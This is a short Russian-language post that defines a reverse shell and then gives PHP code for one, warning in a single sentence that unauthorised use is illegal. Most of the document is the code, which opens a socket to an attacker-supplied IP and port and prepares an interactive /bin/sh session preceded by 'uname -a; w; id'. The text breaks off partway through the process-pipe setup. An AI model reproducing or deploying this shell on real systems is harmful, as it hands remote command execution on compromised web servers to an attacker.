Здравствуйте, дорогие друзья. Реверс-шелл — это тип шелла, который устанавливает соединение обратно к атакующему, позволяя атакующему управлять системой через сеть. Ниже приведен пример кода PHP, который реализует простой реверс-шелл. Однако следует иметь в виду, что использование такого кода без явного разрешения на тестируемой системе считается незаконным и может привести к юридическим последствиям. <?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1'; // Замените на IP-адрес, куда должен подключаться реверс-шелл
$port = 1234; // Замените на порт, который будет слушать удаленный сервер
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
// Создание сокета
if (($sock = fsockopen($ip, $port, $errno, $errstr)) === false) {
echo "Ошибка создания сокета: $errstr ($errno)";
exit(1);
}
// Выполнение оболочки
$descriptorspec = array(
0 => array("pipe", "r"), // stdin - канал, из которого доче